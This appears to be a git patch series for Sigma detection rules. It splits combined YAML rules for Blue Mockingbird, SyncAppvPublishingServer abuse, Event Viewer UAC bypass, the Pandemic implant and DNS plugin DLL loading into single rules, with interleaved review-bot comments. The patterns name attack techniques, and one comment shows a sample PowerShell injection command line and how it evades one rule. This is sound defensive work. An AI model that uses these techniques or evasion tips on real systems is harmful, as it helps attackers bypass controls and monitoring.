rules/windows/malware/registry_event_mal_blue_mockingbird.yml diff --git a/rules/windows/malware/process_creation_mal_blue_mockingbird.yml b/rules/windows/malware/process_creation_mal_blue_mockingbird.yml index 096c0c44..c1a9614b 100644 --- a/rules/windows/malware/process_creation_mal_blue_mockingbird.yml +++ b/rules/windows/malware/process_creation_mal_blue_mockingbird.yml @@ -1,5 +1,10 @@ -action: global title: Blue Mockingbird +id: c3198a27-23a0-4c2c-af19-e5328d49680e +related: + id: ce239692-aa94-41b3-b32f-9cab259c96ea + type: merged +date: 2020/05/14 +modified: 2021/09/11 status: experimental description: Attempts to detect system changes made by Blue Mockingbird references: 
@@ -9,38 +14,19 @@ tags: - attack.t1112 - attack.t1047 author: Trent Liffick (@tliffick) -date: 2020/05/14 -falsepositives: - - unknown -level: high -detection: - condition: 1 of them ---- -id: c3198a27-23a0-4c2c-af19-e5328d49680e logsource: category: process_creation product: windows detection: - exec_selection: - Image|endswith: '\cmd.exe' - CommandLine|contains|all: - - 'sc config' - - 'wercplsupporte.dll' ---- -id: ce239692-aa94-41b3-b32f-9cab259c96ea -logsource: - category: process_creation - product: windows -detection: - wmic_cmd: - Image|endswith: '\wmic.exe' - CommandLine|endswith: 'COR_PROFILER' ---- -id: 92b0b372-a939-44ed-a11b-5136cf680e27 -logsource: - product: windows - category: registry_event -detection: - mod_reg: - TargetObject|endswith: - - '\CurrentControlSet\Services\wercplsupport\Parameters\ServiceDll' + sc_cmd: + Image|endswith: '\cmd.exe' + CommandLine|contains|all: + - 'sc config' + - 'wercplsupporte.dll' + wmic_cmd: + Image|endswith: '\wmic.exe' + CommandLine|endswith: 'COR_PROFILER' + condition: sc_cmd or wmic_cmd +falsepositives: + - unknown +level: high \ No newline at end of file diff --git a/rules/windows/malware/registry_event_mal_blue_mockingbird.yml b/rules/windows/malware/registry_event_mal_blue_mockingbird.yml new file mode 100644 index 00000000..d8eaebda --- /dev/null +++ b/rules/windows/malware/registry_event_mal_blue_mockingbird.yml 
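Review bot: `CommandLine|endswith: 'COR_PROFILER'` in the new `wmic_cmd` selection is brittle: the referenced Red Canary write-up, as I recall it, shows the variable being created with `wmic ENVIRONMENT create name="COR_PROFILER",username=...,VariableValue=...`, where the name sits in the middle of the command line and `endswith` would not fire. `CommandLine|contains: 'COR_PROFILER'` is the safer form; the logic is inherited, but the split is the right moment to fix it. The tag list in the context above also still carries `attack.t1112` (Modify Registry), which now describes only the registry half of the former global rule.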
@@ -0,0 +1,26 @@ +title: Blue Mockingbird +id: 92b0b372-a939-44ed-a11b-5136cf680e27 +related: + id: c3198a27-23a0-4c2c-af19-e5328d49680e + type: derived +date: 2020/05/14 +modified: 2021/09/11 +status: experimental +description: Attempts to detect system changes made by Blue Mockingbird +references: + - https://redcanary.com/blog/blue-mockingbird-cryptominer/ +tags: + - attack.execution + - attack.t1112 + - attack.t1047 +author: Trent Liffick (@tliffick) +logsource: + product: windows + category: registry_event +detection: + mod_reg: + TargetObject|endswith: '\CurrentControlSet\Services\wercplsupport\Parameters\ServiceDll' + condition: mod_reg +falsepositives: + - unknown +level: high \ No newline at end of file From a73d37cd72c307e132343900a4bcba2f75332257 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 11 Sep 2021 14:22:01 +0200 Subject: [PATCH 0877/1367] fix related --- .../windows/malware/process_creation_mal_blue_mockingbird.yml | 4 ++-- rules/windows/malware/registry_event_mal_blue_mockingbird.yml | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/windows/malware/process_creation_mal_blue_mockingbird.yml b/rules/windows/malware/process_creation_mal_blue_mockingbird.yml index c1a9614b..dc66bb56 100644 --- a/rules/windows/malware/process_creation_mal_blue_mockingbird.yml +++ b/rules/windows/malware/process_creation_mal_blue_mockingbird.yml @@ -1,8 +1,8 @@ title: Blue Mockingbird id: c3198a27-23a0-4c2c-af19-e5328d49680e related: - id: ce239692-aa94-41b3-b32f-9cab259c96ea - type: merged + - id: ce239692-aa94-41b3-b32f-9cab259c96ea + type: merged date: 2020/05/14 modified: 2021/09/11 status: experimental diff --git a/rules/windows/malware/registry_event_mal_blue_mockingbird.yml b/rules/windows/malware/registry_event_mal_blue_mockingbird.yml index d8eaebda..ba78af08 100644 --- a/rules/windows/malware/registry_event_mal_blue_mockingbird.yml 
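Review bot: The new registry rule keeps the complete tag set of the former global rule (`attack.execution`, `attack.t1047`), but WMI execution is what the process_creation sibling detects; for a `ServiceDll` modification only `attack.defense_evasion` and `attack.t1112` apply, so trim the list to those. The `related` link is also one-directional: this file declares itself `derived` from c3198a27, while c3198a27 (earlier in this patch) only references ce239692, so the cross-source pairing is not discoverable from the process rule.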
+++ b/rules/windows/malware/registry_event_mal_blue_mockingbird.yml @@ -1,8 +1,8 @@ title: Blue Mockingbird id: 92b0b372-a939-44ed-a11b-5136cf680e27 related: - id: c3198a27-23a0-4c2c-af19-e5328d49680e - type: derived + - id: c3198a27-23a0-4c2c-af19-e5328d49680e + type: derived date: 2020/05/14 modified: 2021/09/11 status: experimental From 2223afb6fe3e791b4761132074b4ed801ab9583d Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 11 Sep 2021 20:30:32 +0200 Subject: [PATCH 0878/1367] split global rules --- .../file_event_advanced_ip_scanner.yml} | 24 ++++++----------- ...owershell_syncappvpublishingserver_exe.yml | 24 +++++++++++++++++ .../process_creation_advanced_ip_scanner.yml | 26 +++++++++++++++++++ ...creation_syncappvpublishingserver_exe.yml} | 22 +++++----------- 4 files changed, 64 insertions(+), 32 deletions(-) rename rules/windows/{process_creation/win_advanced_ip_scanner.yml => file_event/file_event_advanced_ip_scanner.yml} (79%) create mode 100644 rules/windows/powershell/powershell_syncappvpublishingserver_exe.yml create mode 100644 rules/windows/process_creation/process_creation_advanced_ip_scanner.yml rename rules/windows/process_creation/{win_syncappvpublishingserver_exe.yml => process_creation_syncappvpublishingserver_exe.yml} (76%) diff --git a/rules/windows/process_creation/win_advanced_ip_scanner.yml b/rules/windows/file_event/file_event_advanced_ip_scanner.yml similarity index 79% rename from rules/windows/process_creation/win_advanced_ip_scanner.yml rename to rules/windows/file_event/file_event_advanced_ip_scanner.yml index 92df8008..4fdf3650 100644 --- a/rules/windows/process_creation/win_advanced_ip_scanner.yml +++ b/rules/windows/file_event/file_event_advanced_ip_scanner.yml 
@@ -1,5 +1,8 @@ -action: global title: Advanced IP Scanner +id: fed85bf9-e075-4280-9159-fbe8a023d6fa +related: + - id: bef37fa2-f205-4a7b-b484-0759bfd5f86f + type: derived status: experimental description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. references: @@ -10,24 +13,10 @@ references: - https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer author: '@ROxPinTeddy' date: 2020/05/12 -modified: 2021/05/11 +modified: 2021/09/11 tags: - attack.discovery - attack.t1046 -falsepositives: - - Legitimate administrative use -level: medium ---- -id: bef37fa2-f205-4a7b-b484-0759bfd5f86f -logsource: - category: process_creation - product: windows -detection: - selection: - Image|contains: '\advanced_ip_scanner' - condition: selection ---- -id: fed85bf9-e075-4280-9159-fbe8a023d6fa logsource: category: file_event product: windows @@ -35,3 +24,6 @@ detection: selection: TargetFilename|contains: '\AppData\Local\Temp\Advanced IP Scanner 2' condition: selection +falsepositives: + - Legitimate administrative use +level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_syncappvpublishingserver_exe.yml b/rules/windows/powershell/powershell_syncappvpublishingserver_exe.yml new file mode 100644 index 00000000..1b817587 --- /dev/null +++ b/rules/windows/powershell/powershell_syncappvpublishingserver_exe.yml 
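Review bot: `TargetFilename|contains: '\AppData\Local\Temp\Advanced IP Scanner 2'` pins the match to one major version; if the installer's temp directory is named after the product version, as the trailing `2` suggests, a future release silently escapes the rule. `TargetFilename|contains: '\AppData\Local\Temp\Advanced IP Scanner'` keeps the intent without the pin. The `related` entry is one-way as well — the process_creation sibling bef37fa2, created later in this patch, has no `related` block pointing back to fed85bf9.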
@@ -0,0 +1,24 @@ +title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction +id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 +related: + - id: fde7929d-8beb-4a4c-b922-be9974671667 + type: derived +description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. +references: + - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ +author: 'Ensar Şamil, @sblmsrsn, OSCD Community' +date: 2020/10/05 +modified: 2021/09/11 +tags: + - attack.defense_evasion + - attack.t1218 +logsource: + product: windows + service: powershell +detection: + selection: + - 'SyncAppvPublishingServer.exe' + condition: selection +falsepositives: + - App-V clients +level: medium \ No newline at end of file diff --git a/rules/windows/process_creation/process_creation_advanced_ip_scanner.yml b/rules/windows/process_creation/process_creation_advanced_ip_scanner.yml new file mode 100644 index 00000000..7b2b85e2 --- /dev/null +++ b/rules/windows/process_creation/process_creation_advanced_ip_scanner.yml 
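Review bot: The new powershell rule has no `status:` field — every other key survived the split — so add `status: experimental` for consistency with the file_event rule just above. The detection is a bare keyword list, which matches any PowerShell log text containing `SyncAppvPublishingServer.exe`, including script blocks that merely mention the binary; if the targeted PowerShell logs include the injected script body, anchoring on the `"n;` marker used by the process_creation siblings in this patch would be a tighter signal, but I cannot confirm from here which fields the keyword search covers.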
@@ -0,0 +1,26 @@ +title: Advanced IP Scanner +id: bef37fa2-f205-4a7b-b484-0759bfd5f86f +status: experimental +description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. +references: + - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ + - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html + - https://labs.f-secure.com/blog/prelude-to-ransomware-systembc + - https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf + - https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer +author: '@ROxPinTeddy' +date: 2020/05/12 +modified: 2021/05/11 +tags: + - attack.discovery + - attack.t1046 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|contains: '\advanced_ip_scanner' + condition: selection +falsepositives: + - Legitimate administrative use +level: medium \ No newline at end of file diff --git a/rules/windows/process_creation/win_syncappvpublishingserver_exe.yml b/rules/windows/process_creation/process_creation_syncappvpublishingserver_exe.yml similarity index 76% rename from rules/windows/process_creation/win_syncappvpublishingserver_exe.yml rename to rules/windows/process_creation/process_creation_syncappvpublishingserver_exe.yml index fb4c81e3..8a8fb511 100644 --- a/rules/windows/process_creation/win_syncappvpublishingserver_exe.yml +++ b/rules/windows/process_creation/process_creation_syncappvpublishingserver_exe.yml 
@@ -1,31 +1,21 @@ -action: global title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction +id: fde7929d-8beb-4a4c-b922-be9974671667 description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. references: - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ author: 'Ensar Şamil, @sblmsrsn, OSCD Community' date: 2020/10/05 +modified: 2021/09/11 tags: - attack.defense_evasion - attack.t1218 -detection: - condition: selection -falsepositives: - - App-V clients -level: medium ---- -id: fde7929d-8beb-4a4c-b922-be9974671667 logsource: product: windows category: process_creation detection: selection: Image|endswith: '\SyncAppvPublishingServer.exe' ---- -id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 -logsource: - product: windows - service: powershell -detection: - selection: - - 'SyncAppvPublishingServer.exe' \ No newline at end of file + condition: selection +falsepositives: + - App-V clients +level: medium \ No newline at end of file From e355367c0310a8b69605761cbe7d7e2bf7fb79a3 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 12 Sep 2021 07:46:35 +0200 Subject: [PATCH 0879/1367] Clean SyncAppvPublishingServer rules --- .../process_creation_syncappvpublishingserver_exe.yml | 0 ...vpublishingserver_execute_arbitrary_powershell.yml | 6 +++--- ...yncappvpublishingserver_vbs_execute_powershell.yml | 11 ++++++----- 3 files changed, 9 insertions(+), 8 deletions(-) rename rules/windows/{process_creation => deprecated}/process_creation_syncappvpublishingserver_exe.yml (100%) diff --git a/rules/windows/process_creation/process_creation_syncappvpublishingserver_exe.yml b/rules/windows/deprecated/process_creation_syncappvpublishingserver_exe.yml similarity index 100% rename from rules/windows/process_creation/process_creation_syncappvpublishingserver_exe.yml rename to rules/windows/deprecated/process_creation_syncappvpublishingserver_exe.yml 
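Review bot: This rule also lost its `status:` field in the split (no `status` key appears in the rewritten file), and the very next commit moves it under `deprecated/` as a pure rename, so it will sit in the deprecated folder without `status: deprecated` — add that line in whichever commit lands it. The detection itself, `Image|endswith: '\SyncAppvPublishingServer.exe'` alone, fires on every legitimate App-V client run, which is presumably why it is being retired; the two rules touched next in this series, which key on the `"n;` injection marker, are the ones worth keeping.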
diff --git a/rules/windows/process_creation/process_creation_syncappvpublishingserver_execute_arbitrary_powershell.yml b/rules/windows/process_creation/process_creation_syncappvpublishingserver_execute_arbitrary_powershell.yml index 5c67cda5..53a1dd16 100644 --- a/rules/windows/process_creation/process_creation_syncappvpublishingserver_execute_arbitrary_powershell.yml +++ b/rules/windows/process_creation/process_creation_syncappvpublishingserver_execute_arbitrary_powershell.yml @@ -6,9 +6,11 @@ related: status: experimental author: frack113 date: 2021/07/12 +modified: 2021/09/12 description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md + - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ tags: - attack.defense_evasion - attack.t1218 @@ -18,9 +20,7 @@ logsource: detection: selection: Image|endswith: '\SyncAppvPublishingServer.exe' - CommandLine|contains|all: - - '"n; ' - - ' Start-Process ' + CommandLine|contains: '"n; ' condition: selection fields: - ComputerName diff --git a/rules/windows/process_creation/process_creation_syncappvpublishingserver_vbs_execute_powershell.yml b/rules/windows/process_creation/process_creation_syncappvpublishingserver_vbs_execute_powershell.yml index 54782330..59ddee7c 100644 --- a/rules/windows/process_creation/process_creation_syncappvpublishingserver_vbs_execute_powershell.yml +++ b/rules/windows/process_creation/process_creation_syncappvpublishingserver_vbs_execute_powershell.yml 
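Review bot: The new `CommandLine|contains: '"n; '` carries a trailing space, while the sibling `.vbs` rule in this same commit matches `'"n;'` without one; a payload written as `SyncAppvPublishingServer.exe "n;Start-Process calc"` (no space after the semicolon) should still execute in PowerShell but would evade the exe rule and not the vbs rule. Use `CommandLine|contains: '"n;'` here too so the pair agrees. Dropping the `Start-Process` requirement is a sensible widening — any code after the injected `;` is the point — but the description could say so explicitly.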
@@ -3,23 +3,24 @@ id: 36475a7d-0f6d-4dce-9b01-6aeb473bbaf1 status: experimental author: frack113 date: 2021/07/16 -description: Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. +modified: 2021/09/12 +description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md + - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ tags: - attack.defense_evasion + - attack.t1218 - attack.t1216 logsource: category: process_creation product: windows detection: select_vbs: - CommandLine|contains: '\SyncAppvPublishingServer.vbs' - select_opt: CommandLine|contains|all: + - '\SyncAppvPublishingServer.vbs' - '"n;' - - 'Start-Process ' - condition: select_vbs and select_opt + condition: select_vbs fields: - ComputerName - User From 830c0c9f221f5ee8bd14dc1a6dbe5b2f5a2bbd05 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 12 Sep 2021 08:53:10 +0200 Subject: [PATCH 0880/1367] Update process_creation_advanced_ip_scanner.yml --- .../process_creation/process_creation_advanced_ip_scanner.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/process_creation_advanced_ip_scanner.yml b/rules/windows/process_creation/process_creation_advanced_ip_scanner.yml index 7b2b85e2..36e07720 100644 --- a/rules/windows/process_creation/process_creation_advanced_ip_scanner.yml +++ b/rules/windows/process_creation/process_creation_advanced_ip_scanner.yml @@ -10,7 +10,7 @@ references: - https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer author: '@ROxPinTeddy' date: 2020/05/12 -modified: 2021/05/11 +modified: 2021/09/12 tags: - attack.discovery - attack.t1046 @@ -23,4 +23,4 @@ detection: condition: selection falsepositives: - Legitimate administrative use -level: medium \ No newline at end of file +level: medium 
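Review bot: Adding `attack.t1218` to the `.vbs` rule looks like a taxonomy mismatch: T1218 is Signed Binary Proxy Execution, whereas a Microsoft-signed script run through wscript/cscript is T1216 (Signed Script Proxy Execution), which the rule already carried. Unless the LOLBAS entry for the script maps it to T1218 — I cannot verify that from here — keep only `attack.t1216`. The selection now depends solely on `CommandLine`; if the intent is to fire on execution rather than on any command line that mentions the script, an `Image|endswith: ['\wscript.exe', '\cscript.exe']` constraint would tighten it.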
From 3db427873a4c25fb40eb53f25506fc06eb4bf353 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 12 Sep 2021 09:38:05 +0200 Subject: [PATCH 0881/1367] split sysinternals eula and uac bypass --- ...s_creation_sysinternals_eula_accepted.yml} | 29 +++++++------------ ...s_creation_sysmon_uac_bypass_eventvwr.yml} | 25 +++++----------- ...istry_event_sysinternals_eula_accepted.yml | 23 +++++++++++++++ .../registry_event_uac_bypass_eventvwr.yml | 27 +++++++++++++++++ 4 files changed, 69 insertions(+), 35 deletions(-) rename rules/windows/{registry_event/sysmon_sysinternals_eula_accepted.yml => process_creation/process_creation_sysinternals_eula_accepted.yml} (68%) mode change 100755 => 100644 rename rules/windows/{registry_event/sysmon_uac_bypass_eventvwr.yml => process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml} (73%) mode change 100755 => 100644 create mode 100755 rules/windows/registry_event/registry_event_sysinternals_eula_accepted.yml create mode 100755 rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml diff --git a/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml b/rules/windows/process_creation/process_creation_sysinternals_eula_accepted.yml old mode 100755 new mode 100644 similarity index 68% rename from rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml rename to rules/windows/process_creation/process_creation_sysinternals_eula_accepted.yml index bde975b9..0b9abfec --- a/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml +++ b/rules/windows/process_creation/process_creation_sysinternals_eula_accepted.yml 
@@ -1,33 +1,26 @@ -action: global title: Usage of Sysinternals Tools +id: 7cccd811-7ae9-4ebe-9afd-cb5c406b824b +related: + - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 + type: derived status: experimental description: Detects the usage of Sysinternals Tools due to accepteula key being added to Registry references: - https://twitter.com/Moti_B/status/1008587936735035392 date: 2017/08/28 +modified: 2021/09/12 author: Markus Neis -falsepositives: - - Legitimate use of SysInternals tools - - Programs that use the same Registry Key -level: low tags: - attack.resource_development - attack.t1588.002 ---- -id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 -logsource: - product: windows - category: registry_event -detection: - selection1: - TargetObject|endswith: '\EulaAccepted' - condition: 1 of them ---- -id: 7cccd811-7ae9-4ebe-9afd-cb5c406b824b logsource: category: process_creation product: windows detection: - selection2: + selection: CommandLine|contains: ' -accepteula' - condition: 1 of them + condition: selection +falsepositives: + - Legitimate use of SysInternals tools + - Programs that use the same Registry Key +level: low \ No newline at end of file diff --git a/rules/windows/registry_event/sysmon_uac_bypass_eventvwr.yml b/rules/windows/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml old mode 100755 new mode 100644 similarity index 73% rename from rules/windows/registry_event/sysmon_uac_bypass_eventvwr.yml rename to rules/windows/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml index ed8f6054..a0f16d53 --- a/rules/windows/registry_event/sysmon_uac_bypass_eventvwr.yml +++ b/rules/windows/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml @@ -1,5 +1,8 @@ -action: global title: UAC Bypass via Event Viewer +id: be344333-921d-4c4d-8bb8-e584cf584780 +related: + - id: 7c81fec3-1c1d-43b0-996a-46753041b1b6 + type: derived status: experimental description: Detects UAC bypass method using Windows event viewer references: 
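Review bot: `CommandLine|contains: ' -accepteula'` misses the slash form — Sysinternals tools accept `/accepteula` as well as `-accepteula`, and the slash form is common in scripted use — so the selection should be a list: `CommandLine|contains: [' -accepteula', ' /accepteula']`. The tags `attack.resource_development`/`attack.t1588.002` describe obtaining tools rather than running them; for a process_creation rule that observes execution, `attack.execution` fits better, though that is inherited from the global rule rather than introduced here.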
@@ -7,28 +10,13 @@ references: - https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100 author: Florian Roth date: 2017/03/19 -modified: 2020/09/06 +modified: 2021/09/12 tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1088 # an old one - attack.t1548.002 - car.2019-04-001 -falsepositives: - - unknown -level: critical ---- -id: 7c81fec3-1c1d-43b0-996a-46753041b1b6 -logsource: - product: windows - category: registry_event -detection: - methregistry: - TargetObject|startswith: 'HKU\' - TargetObject|endswith: '\mscfile\shell\open\command' - condition: methregistry ---- -id: be344333-921d-4c4d-8bb8-e584cf584780 logsource: category: process_creation product: windows @@ -41,3 +29,6 @@ detection: fields: - CommandLine - ParentCommandLine +falsepositives: + - unknown +level: critical \ No newline at end of file diff --git a/rules/windows/registry_event/registry_event_sysinternals_eula_accepted.yml b/rules/windows/registry_event/registry_event_sysinternals_eula_accepted.yml new file mode 100755 index 00000000..2865be13 --- /dev/null +++ b/rules/windows/registry_event/registry_event_sysinternals_eula_accepted.yml @@ -0,0 +1,23 @@ +title: Usage of Sysinternals Tools +id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 +status: experimental +description: Detects the usage of Sysinternals Tools due to accepteula key being added to Registry +references: + - https://twitter.com/Moti_B/status/1008587936735035392 +date: 2017/08/28 +modified: 2021/09/12 +author: Markus Neis +tags: + - attack.resource_development + - attack.t1588.002 +logsource: + product: windows + category: registry_event +detection: + selection: + TargetObject|endswith: '\EulaAccepted' + condition: selection +falsepositives: + - Legitimate use of SysInternals tools + - Programs that use the same Registry Key +level: low \ No newline at end of file 
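Review bot: `TargetObject|endswith: '\EulaAccepted'` in the new registry rule matches any vendor's EulaAccepted value, which the rule itself admits under falsepositives (`Programs that use the same Registry Key`). Sysinternals tools write this flag under `HKCU\Software\Sysinternals\<tool>\EulaAccepted` as far as I know, so adding `TargetObject|contains: '\Software\Sysinternals\'` to the selection removes that false-positive class without losing coverage. The UAC bypass hunks on this line only move metadata; their detection logic lies in unchanged context outside the hunk.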
diff --git a/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml b/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml new file mode 100755 index 00000000..bdbd285e --- /dev/null +++ b/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml @@ -0,0 +1,27 @@ +title: UAC Bypass via Event Viewer +id: 7c81fec3-1c1d-43b0-996a-46753041b1b6 +status: experimental +description: Detects UAC bypass method using Windows event viewer +references: + - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ + - https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100 +author: Florian Roth +date: 2017/03/19 +modified: 2021/09/12 +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1088 # an old one + - attack.t1548.002 + - car.2019-04-001 +logsource: + product: windows + category: registry_event +detection: + methregistry: + TargetObject|startswith: 'HKU\' + TargetObject|endswith: '\mscfile\shell\open\command' + condition: methregistry +falsepositives: + - unknown +level: critical \ No newline at end of file From f3ad5953d5eec1d1cb000e36bd8d04c817ed1bd7 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 12 Sep 2021 09:42:11 +0200 Subject: [PATCH 0882/1367] split sysmon_apt_pandemic --- .../process_creation_apt_pandemic.yml | 33 +++++++++++++++++ ...ic.yml => registry_event_apt_pandemic.yml} | 36 +++++++------------ 2 files changed, 46 insertions(+), 23 deletions(-) create mode 100644 rules/windows/process_creation/process_creation_apt_pandemic.yml rename rules/windows/registry_event/{sysmon_apt_pandemic.yml => registry_event_apt_pandemic.yml} (68%) diff --git a/rules/windows/process_creation/process_creation_apt_pandemic.yml b/rules/windows/process_creation/process_creation_apt_pandemic.yml new file mode 100644 index 00000000..9f0add88 --- /dev/null 
+++ b/rules/windows/process_creation/process_creation_apt_pandemic.yml @@ -0,0 +1,33 @@ +title: Pandemic Registry Key +id: 9fefd33c-339d-4495-9cba-b96ca006f512 +related: + - id: 47e0852a-cf81-4494-a8e6-31864f8c86ed + type: derived +status: experimental +description: Detects Pandemic Windows Implant +references: + - https://wikileaks.org/vault7/#Pandemic + - https://twitter.com/MalwareJake/status/870349480356454401 +tags: + - attack.lateral_movement + - attack.t1105 +author: Florian Roth +date: 2017/06/01 +modified: 2021/09/12 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: 'loaddll -a ' + condition: selection +falsepositives: + - unknown +level: critical +fields: + - EventID + - CommandLine + - ParentCommandLine + - Image + - User + - TargetObject \ No newline at end of file diff --git a/rules/windows/registry_event/sysmon_apt_pandemic.yml b/rules/windows/registry_event/registry_event_apt_pandemic.yml similarity index 68% rename from rules/windows/registry_event/sysmon_apt_pandemic.yml rename to rules/windows/registry_event/registry_event_apt_pandemic.yml index e0f2d122..eef303ef 100755 --- a/rules/windows/registry_event/sysmon_apt_pandemic.yml +++ b/rules/windows/registry_event/registry_event_apt_pandemic.yml @@ -1,5 +1,5 @@ -action: global title: Pandemic Registry Key +id: 47e0852a-cf81-4494-a8e6-31864f8c86ed status: experimental description: Detects Pandemic Windows Implant references: 
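Review bot: The `fields` list of the new process_creation rule still contains `TargetObject`, a registry-event field that process creation events do not carry; it was inherited from the global rule and should be dropped here (the registry sibling keeps it). `EventID` in that list is also of little use once the logsource is the generic `process_creation` category. The `related` link is one-way again: the registry rule 47e0852a below carries no reference back to 9fefd33c.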
@@ -10,31 +10,21 @@ tags:
 - attack.t1105
 author: Florian Roth
 date: 2017/06/01
+modified: 2021/09/12
+logsource:
+ category: registry_event
+ product: windows
+detection:
+ selection:
+ TargetObject|contains: '\SYSTEM\CurrentControlSet\services\null\Instance'
+ condition: selection
+falsepositives:
+ - unknown
+level: critical
 fields:
 - EventID
 - CommandLine
 - ParentCommandLine
 - Image
 - User
- - TargetObject
-falsepositives:
- - unknown
-level: critical
----
-id: 47e0852a-cf81-4494-a8e6-31864f8c86ed
-logsource:
- category: registry_event
- product: windows
-detection:
- selection1:
- TargetObject|contains: '\SYSTEM\CurrentControlSet\services\null\Instance'
- condition: 1 of them
----
-id: 9fefd33c-339d-4495-9cba-b96ca006f512
-logsource:
- category: process_creation
- product: windows
-detection:
- selection2:
- CommandLine|contains: 'loaddll -a '
- condition: 1 of them
+ - TargetObject
\ No newline at end of file
From 81c2b2731ce7031778aa4d940b05925b34e0b2c3 Mon Sep 17 00:00:00 2001
From: frack113
Date: Sun, 12 Sep 2021 09:53:20 +0200
Subject: [PATCH 0883/1367] split sysmon_dns_serverlevelplugindll.yml
---
...ess_creation_dns_serverlevelplugindll.yml} | 40 ++++++++----------
...egistry_event_dns_serverlevelplugindll.yml | 32 +++++++++++++++
2 files changed, 48 insertions(+), 24 deletions(-)
rename rules/windows/{registry_event/sysmon_dns_serverlevelplugindll.yml => process_creation/process_creation_dns_serverlevelplugindll.yml} (73%)
mode change 100755 => 100644
create mode 100755 rules/windows/registry_event/registry_event_dns_serverlevelplugindll.yml
diff --git a/rules/windows/registry_event/sysmon_dns_serverlevelplugindll.yml b/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml
old mode 100755
new mode 100644
similarity index 73%
rename from rules/windows/registry_event/sysmon_dns_serverlevelplugindll.yml
rename to rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml
index a40600b8..006a7560
--- a/rules/windows/registry_event/sysmon_dns_serverlevelplugindll.yml
+++ b/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml
@@ -1,39 +1,21 @@
-action: global
 title: DNS ServerLevelPluginDll Install
+id: f63b56ee-3f79-4b8a-97fb-5c48007e8573
+related:
+ - id: e61e8a88-59a9-451c-874e-70fcc9740d67
+ type: derived
 status: experimental
 description: Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)
 references:
 - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
 date: 2017/05/08
-modified: 2020/09/06
+modified: 2021/09/12
 author: Florian Roth
 tags:
 - attack.defense_evasion
 - attack.t1073 # an old one
 - attack.t1574.002
 - attack.t1112
-fields:
- - EventID
- - CommandLine
- - ParentCommandLine
- - Image
- - User
- - TargetObject
-falsepositives:
- - unknown
-level: high
----
-id: e61e8a88-59a9-451c-874e-70fcc9740d67
-logsource:
- product: windows
- category: registry_event
-detection:
- dnsregmod:
- TargetObject|endswith: '\services\DNS\Parameters\ServerLevelPluginDll'
- condition: 1 of them
----
-id: f63b56ee-3f79-4b8a-97fb-5c48007e8573
 logsource:
 category: process_creation
 product: windows
@@ -43,4 +25,14 @@ detection:
 CommandLine|contains|all:
 - '/config'
 - '/serverlevelplugindll'
- condition: 1 of them
+ condition: dnsadmin
+falsepositives:
+ - unknown
+level: high
+fields:
+ - EventID
+ - CommandLine
+ - ParentCommandLine
+ - Image
+ - User
+ - TargetObject
\ No newline at end of file
